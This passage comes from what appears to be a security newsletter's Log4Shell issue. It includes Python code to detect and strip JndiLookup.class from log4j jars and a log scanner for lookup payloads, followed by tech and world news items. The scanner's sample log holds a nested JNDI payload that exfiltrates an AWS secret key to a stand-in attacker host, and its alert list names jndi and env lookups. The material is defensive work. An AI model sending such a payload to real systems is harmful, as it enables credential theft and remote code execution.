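        return "set log4j2.formatMsgNoLookups=true (or remove JndiLookup.class)"
    return "remove JndiLookup.class from the jar"


def inspect_jar(jar_bytes: bytes) -> Tuple[Optional[str], bool]:
    """Return (version from pom.properties or None, whether JndiLookup.class is present)."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        names = set(jar.namelist())
        version = None
        if POM_PROPERTIES in names:
            for line in jar.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        return version, JNDI_LOOKUP_CLASS in names


def strip_jndi_lookup(jar_bytes: bytes) -> bytes:
    """Return a copy of the jar without JndiLookup.class, which is what the
    'zip -q -d' command does in place. zipfile cannot delete entries, so every
    other entry is copied across unchanged (same name, same compression)."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as src, zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            if info.filename == JNDI_LOOKUP_CLASS:
                continue
            dst.writestr(info, src.read(info.filename))
    return out.getvalue()


def build_sample_jar(version: str, with_jndi_lookup: bool = True) -> bytes:
    """Constructed stand-in for a log4j-core jar: real entry names, dummy class bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        jar.writestr(POM_PROPERTIES,
                     f"artifactId=log4j-core\ngroupId=org.apache.logging.log4j\nversion={version}\n")
        jar.writestr("org/apache/logging/log4j/core/lookup/StrLookup.class", b"\xca\xfe\xba\xbe")
        if with_jndi_lookup:
            jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


if __name__ == "__main__":
    original = build_sample_jar("2.14.1")
    version, has_jndi = inspect_jar(original)
    print(f"log4j-core {version}: JndiLookup present={has_jndi} -> {mitigation_for(version or '0')}")
    fixed = strip_jndi_lookup(original)
    print("after stripping: JndiLookup present =", inspect_jar(fixed)[1])
```

To use it on a real jar, read the file into bytes, call inspect_jar, and write the result of strip_jndi_lookup back out; keep in mind that many applications bundle log4j-core inside fat jars or WAR files, so the walk has to recurse into nested archives, which this example leaves to the reader.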
Note: WAF can help but won’t solve the problem. Most companies’ backend systems are already clogged with these malicious payloads, from multiple ingress points. We can’t fix the problem by stopping more from coming in. The only fix is securing the systems that will inevitably come in contact with that malicious input.
Detection: I know many companies using Semgrep to find vulnerable inclusions of user-provided data. Here’s an example Semgrep rule I got from Clint Gibler of R2C/TLDRSec.
Vaccination: This is definitely on the crazier side of things, but one clever approach is to use the vulnerability to mitigate the vulnerability. Specifically, it’s using the RCE functionality to set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. | Code via Cybereason
Other Considerations: As David Litchfield pointed out in a number of tweets, this isn’t just HTTP. Any service you have that takes input, including SMTP, IMAP, etc., are all additional attack vectors. Also consider second and N-level order processing of content on the backend as part of batch processes and other types of automation.
Analysis: What’s so remarkable about this vulnerability is not just its criticality or reach—but the root cause at the developer incentives level. Like Heartbleed—the project had very few eyes on it, and all those eyes were volunteers. What we should be thinking about isn’t just log4j. What we should be thinking about is how many other projects are out there that have similar characteristics:
The project is maintained by very few people in their spare time for no money, and
If the project had a major issue it would disrupt the entire internet
We simply have too much critical internet infrastructure maintained by a handful of people in their spare time. And those few people are often not able or incentivized to evaluate what they’re creating from a security standpoint.
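The Semgrep rule mentioned under Detection finds the vulnerable code; the complementary check is finding the payloads already sitting in your logs. The following added example (my code, not the newsletter’s) scans log lines for lookup expressions, and the point it makes is that nested payloads like the AWS-key example above defeat a naive regex, so the braces have to be matched properly. The access-log lines, the attacker.invalid host and the ALERT_PREFIXES set are constructed for this example.

```python
import re

# Prefixes worth alerting on in logged input: jndi is the RCE path, env/sys leak secrets.
ALERT_PREFIXES = {"jndi", "env", "sys"}

def extract_lookups(text):
    r"""Return every ${...} expression in text, innermost first. Braces are
    matched with a stack because a regex such as \$\{[^}]*\} stops at the
    first '}' and so reports only the inner env: lookup of a nested payload."""
    found, stack, i = [], [], 0
    while i < len(text):
        if text.startswith("${", i):
            stack.append(i)
            i += 2
        elif text[i] == "}" and stack:
            found.append(text[stack.pop():i + 1])
            i += 1
        else:
            i += 1
    return found

def lookup_prefix(expr):
    """'${jndi:ldap://...}' -> 'jndi'; a nested or prefix-less form -> ''."""
    m = re.match(r"\$\{([A-Za-z0-9_-]+):", expr)
    return m.group(1).lower() if m else ""

def scan_log_line(line):
    """Return (reason, expression) findings for one log line."""
    findings = []
    for expr in extract_lookups(line):
        prefix = lookup_prefix(expr)
        if prefix in ALERT_PREFIXES:
            findings.append((prefix + "-lookup", expr))
        elif "${" in expr[2:]:
            findings.append(("nested-lookup", expr))  # prefix hidden by nesting
    return findings

def scan_log(lines):
    """Map line number -> findings for every line that has at least one."""
    report = {}
    for num, line in enumerate(lines, 1):
        hits = scan_log_line(line)
        if hits:
            report[num] = hits
    return report

SAMPLE_LOG = [  # constructed access-log lines, not real traffic
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.attacker.invalid}"',
    '10.0.0.7 - - "GET /search?q=${env:PWD} HTTP/1.1" 200 "curl/7.79.1"',
]
```

Run scan_log over any text log (access logs, mail logs, batch-job output) rather than only HTTP, for the reason given under Other Considerations.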
This is not their fault. They’re heroes for keeping the lights on. It’s our fault because we know how bad the situation is and we just YOLO through life as if we didn’t. The result is that we get to learn about internet-stopping vulnerabilities from the Minecraft community.
—
The FBI says a ransomware gang out of Cuba has been launching ransomware attacks against US critical infrastructure. They’ve released IoCs to help others find attacks from the group. More
The FTC says Americans lost $148 million to gift card scams in 2021. More
Attackers are using the log4j vulnerability to install malware, including cryptominers and Mirai and Muhstik botnet clients. More
QNAP says there’s new cryptominer malware targeting vulnerable QNAP NAS devices. More
CIA Director William Burns said on Monday that the CIA “has a number of different projects focused on cryptocurrency”. He went on to say, “My predecessor had started this, but had set in motion a number of different projects focused on cryptocurrency and trying to look at second and third-order consequences as well and helping with our colleagues in other parts of the U.S. government to provide solid intelligence on what we’re seeing as well.” More
Incidents: Volvo says attackers have stolen research and development information after hacking some of its servers. More Marriott has suffered another data breach affecting 5.2 million guests. More
Vulnerabilities: log4j Critical RCE | Critical | RCE More SonicWall VPN Bugs in SMA 100-series Devices | Critical | RCE More 4 WordPress Plugins | Critical | 1.6 Million Sites Affected | More Mozilla Firefox and Thunderbird | High More
Companies: Incode raises $220 million to do identity verification and authentication. More
TECHNOLOGY NEWS
DeepMind has revealed a new 280 billion parameter language model called Gopher. More
Italy has fined Amazon $1.3 billion for abusing its market position. More
Over 200 US newspapers have filed suit against Facebook and Google for monopolizing digital ad revenue—and by extension—online news. More
Meta has released Horizon Worlds, its social virtual reality space, to the world after more than a year in private testing mode. The platform functions much like Roblox in that you can create your own games within the base game. You currently can’t make money from your own games, but you can enter creator competitions and win money that way. More
Sports streaming is starting to intersect with sports betting, and Disney is deep into it. It’s the combination of watching sports with your friends and betting at the same time. More
People have spent $27 billion on NFTs in 2021 so far. Cryptopunks are the most popular collection with $3 billion in sales. More
HUMAN NEWS
Evergrande is a massive real estate company in China with over 200,000 employees, and it has defaulted on over $300 billion in outstanding liabilities. Beijing has intervened to prevent a collapse of the company. More
A new paper in Nature finds that exercise plasma boosts memory and dampens brain inflammation in mice. Interestingly, it shows that the plasma can be transferred to other mice, which see the benefits as well. More
New research shows that Covid attacks fat tissue, which could be why obese people have been at higher risk of severe illness and death. More
Germany reported 70,000 new Covid infections last Wednesday, along with 534 deaths. These are the highest numbers in the country since February. More
60% of Republicans are confident in doctors’ advice, down from 73% in 2010. More
CONTENT, IDEAS & ANALYSIS
The Vigilant — We should have a new internet group called The Vigilant—a group of open-source code maintainers that steward and protect our top 1000 open-source applications. Read the Blog
NOTES
I was sad to hear that Anne Rice has died. She was 80. More than vampires, she gave me a love for New Orleans. So much so that when I visited it, it seemed somewhat familiar. She’ll be missed. More
I’m really looking forward to taking some time off soon around the holidays. I have a good amount of content that’s around 60-80% done, and I want to get it all over the line by January 1st.
Thanks to Caleb Sima for input into my log4j analysis above.
DISCOVERY
Ben Evans put out the latest version of his annual presentation on technology trends, and it’s remarkably good as usual. Covers the rebranding of Web 1, 2, and 3, Crypto, VR/AR, NFTs, and so much more. More
Ryan Holiday’s 9 Rules for a better life. More
A Semgrep rule for detecting insecure log4j logging. More
“This week the internet has learned—once again—that asset management is the center of security. It’s hard to patch what you can’t find.” — Daniel Miessler
“The most consequential figures in the tech world are half guys like steve jobs and bill gates and half some guy named Ronald who maintains a Unix tool called ‘runk’ which stands for Ronald’s Universal Number Kounter and handles all math for every machine on earth.” — Druthers Haver
StopLyingCloud — An honest AWS service health dashboard. More
Amazon Brand Detector — A Chrome extension for detecting which products on Amazon are Amazon-owned. More
TimeandDate — A tool for seeing where planets are visible in the night sky where you live. More
Diagrams — Draw cloud system architecture diagrams using Python code. More
Log4Shell Recon and Post-Exploitation Network Detection — A collection of detection rules and IOCs by NCC. More | by NCC Research
Log4jAttackSurface — A Curated List of Companies and Technologies Affected by Log4Shell More | by YfryTcshsGD
Border Collie — Uses Semgrep and watchdog to detect reverse shells in your environment. More
RECOMMENDATIONS
Many people in tech have been working tirelessly since Thursday on Log4Shell. If you have any authority or influence to help them at work, make sure they get some public love within the organization, along with some extra time off.
APHORISMS
“We don’t rise to the level of our goals. We fall to the level of our systems.”
James Clear